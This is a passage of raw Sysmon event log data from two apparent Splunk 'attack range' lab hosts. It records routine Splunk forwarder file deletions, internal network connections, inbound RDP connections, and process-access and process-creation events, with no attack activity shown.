11:06:39.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B868E02F2B6A154E091D43697F2BB60F,SHA256=85F4CFA2E59BC248EDA0C2D32E6624A4BEFCF846D42D1FC6C8262BDF7370862E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:40.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A353F308FE25211AAE014119B9A0411,SHA256=2EBA9DEEBD1082C2D70A9272702B2399403BBE892DF89ABE5E28A5A0CA3CE4DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:40.485{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D546C0671BC95636091DB4F45C72A471,SHA256=9FA5751A4BB8FD9B4B64949F578E3C8A8F3BFBB768B87A1093FD97619720E08E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:40.201{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:40.632{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63D36320B7ED8EB5F0D8288F4D6F926E,SHA256=C21E2164E8315E4FAF7999A6336DDEB43EFBFCEC16C6D6790E3CD43658E5986C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:37.731{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx58005-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:41.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6DCC0F40C5EC925504ECC58454111EA,SHA256=9B8A39207E2BB6FB96CDBCFD6275362CAEFDAB6AFAC9A3526837F4EDE7707BAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:41.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=133048FB0FCA8E62D1AF6D515CEDCB6C,SHA256=4FB3F9104D54D1835E908210A2A20B9AF29CB631A4452837283733C76316B1EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:41.002{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-150MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:42.944{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B68AD351F06EDC3A3563B65EA5F9F109,SHA256=5DAA36AE645F67908926AF30D4504E94DBB51F6BE3420841811B54BBFC819421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:42.536{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4D9DADC8D607504C86A3BAB124EC4F8,SHA256=FAC31C1FA88006389BBE0A2F3D3F59316B492FC6BB2CEA97F64DE2BD7F667B41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:39.659{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49235-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000295455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:39.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:43.960{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706B283ADCD54A181F0EB2BF0822FEDF,SHA256=0E2A17A7E0FBB7F1DAF6F0E36ECD538E177D788117DEB6DFF1FFCF44C0063E65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:43.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F6778D5F4F66C609BA89F9D86C7571,SHA256=089D58581CDBF4345E5B4A1250F1D3DED97DC60723E5D078E60B3DF9115E584E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:40.707{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx51005-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:40.658{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51528-false10.0.1.12-8000- 23542300x8000000000000000219562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.960{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B07C7978070F1E5B8368933C1AC4EA5,SHA256=225A665F835935A37A55790DE0B719101E82BC2EA5EDE81176B34B6DA9421918,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:44.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BA2E719FE15F84190EC5BEB2A1B92E5,SHA256=8667E9539FF40EA7CDCF5882A39C125A1FD6F485BEB2CCDABDE10376D14DE23F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.928{4F8D34B0-1544-6216-C904-000000003902}35763068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE8ED4744BC2978EC6EBAAC202AC2149,SHA256=C915DE9C6BEC02EF4175E0584CFA5D88E8B8FB65FAF22588E5763614AFA63A0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1544-6216-C904-000000003902}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1544-6216-C904-000000003902}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.678{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1544-6216-C904-000000003902}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.679{4F8D34B0-1544-6216-C904-000000003902}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69523A737EDCF3EFE84F357EEFA44E54,SHA256=F871A02495739114C7051328793F78A0A2FF3B4EBB1F7AF5BB391E3262986DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:45.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C5EA2A8A1FD8B164710C5D5DB090B91,SHA256=E331497FC938610B3330A0069DB95367943774EA0FB3B610F3B1BC2EA4249A5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1545-6216-CA04-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 